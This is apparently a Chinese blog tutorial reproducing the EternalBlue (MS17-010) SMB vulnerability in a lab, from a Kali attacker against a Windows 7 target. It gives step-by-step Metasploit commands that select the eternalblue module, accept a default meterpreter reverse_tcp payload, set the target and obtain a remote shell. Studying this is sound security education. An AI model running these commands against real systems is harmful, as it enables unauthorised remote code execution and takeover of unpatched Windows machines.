概述
Eternalblue通過TCP埠445和139來利用SMBv1和NBT中的遠程代碼執行漏洞,惡意代碼會掃描開放445檔案共享埠的Windows機器,無需用戶任何操作,只要開機上網,不法分子就能在電腦和服務器中植入勒索軟體、遠程控制木馬、虛擬貨幣挖礦機等惡意程式,
影響版本
目前已知受影響的Windows 版本包括但不限于:WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0
復現環境
攻擊機: kali (192.168.25.130)
靶機:Windows 7 (192.168.25.132)
靶機(192.168.25.132) ping 攻擊機kali(192.168.25.130):
攻擊機kali(192.168.25.130)ping 靶機(192.168.25.132) :
進入MSF
kali自帶的一個工具,無需下載,輸入msfconsole啟動框架:
msfconsole
啟動成功后搜索使用ms17-010攻擊模塊,對靶機進行攻擊
search ms17_010
使用exploit/windows/smb/ms17_010_eternalblue,只需要use 前面的數字即可,0就是exploit/windows/smb/ms17_010_eternalblue,1就是exploit/windows/smb/ms17_010_psexec以此類推,
use 0
顯示No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp ,意思是說沒有設定payload,但是它默認使用windows/x64/meterpreter/reverse_tcp這個payload,所以就不用設定payload了,
show options
show options查看需要設定的引數,yes的都需要設定,如果Current Setting已經有了數值,都是默認值,也可以自己修改,這里用默認的445埠就行了,所以只需設定RHOSTS就行,
set rhosts 192.168.25.132
run或者exploit,進行攻擊:
輸入shell,進入控制臺面板:
ipconfig查看ip
whoami查看當前用戶權限
文章原創,歡迎轉載,請注明文章出處: 永恒之藍 (Ms17-010)漏洞復現.,百度和各類采集站皆不可信,搜索請謹慎鑒別,技術類文章一般都有時效性,本人習慣不定期對自己的博文進行修正和更新,因此請訪問出處以查看本文的最新版本,
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/389059.html
標籤:其他
下一篇:主機加固1